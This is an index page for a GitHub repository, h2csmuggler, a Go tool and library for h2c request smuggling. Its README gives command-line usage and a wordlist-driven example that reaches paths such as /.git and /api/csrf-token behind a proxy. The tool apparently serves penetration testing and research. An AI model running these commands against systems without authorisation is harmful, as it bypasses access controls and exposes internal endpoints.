Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/assetnote/h2csmuggler
https://github.com/assetnote/h2csmuggler
Last synced: 3 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/assetnote/h2csmuggler
- Owner: assetnote
- License: other
- Created: 2020-09-17T00:51:54.000Z (about 4 years ago)
- Default Branch: master
- Last Pushed: 2024-02-11T02:05:43.000Z (9 months ago)
- Last Synced: 2024-06-26T00:35:44.361Z (5 months ago)
- Language: Go
- Size: 381 KB
- Stars: 66
- Watchers: 8
- Forks: 12
- Open Issues: 4
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- WebHackersWeapons - h2csmuggler
README
# h2cSmuggler
## Tl;dr
this repo implements h2csmuggler from https://github.com/BishopFox/h2csmuggler in golang.
this repo also implements a golang library for performing h2c smuggling. This was done via forking the net/http2 library and modifying the client to accept and process non-spec compliant h2c upgrades over tls connections. This can also handle h2c upgrades over http.
Two utilities have been added to assist testing:
```
# check will return whether a h2c connection can be formed and the first request will return
go run ./cmd/h2csmuggler check https://google.com/ http://localhost
# smuggle will attempt the cli arguments as URLs sequentially
go run ./cmd/h2csmuggler smuggle https://google.com/ https://google.com/flag
# demo will create a http server that accepts non-complaint `Connection: Upgrade` connections and upgrade them to h2c for testing
go run ./cmd/demo
$ cat ~/tools/lists/rafter.txt | head -n 10 | ./h2cs mutate pitchfork http://localhost - -p api | ./h2cs smuggle http://localhost - -ojson
{"body":38,"level":"info","msg":"success","status":200,"target":"http://localhost/javsacript/main.js","time":"2020-09-16T12:43:05+10:00"}
{"body":39,"level":"info","msg":"success","status":200,"target":"http://localhost/javascripts/main.js","time":"2020-09-16T12:43:05+10:00"}
{"body":24,"level":"info","msg":"success","status":200,"target":"http://localhost/.git","time":"2020-09-16T12:43:05+10:00"}
{"body":28,"level":"info","msg":"success","status":200,"target":"http://localhost/api/_rpc","time":"2020-09-16T12:43:05+10:00"}
{"body":34,"level":"info","msg":"success","status":200,"target":"http://localhost/api/csrf-token","time":"2020-09-16T12:43:05+10:00"}
{"body":27,"level":"info","msg":"success","status":200,"target":"http://localhost/cgi-bin","time":"2020-09-16T12:43:05+10:00"}
```
### Author
Twitter: [@seanyeoh](https://twitter.com/seanyeoh)
GitHub: [minight](https://github.com/minight/)
### Original Research
Jake Miller - https://github.com/BishopFox/h2csmuggler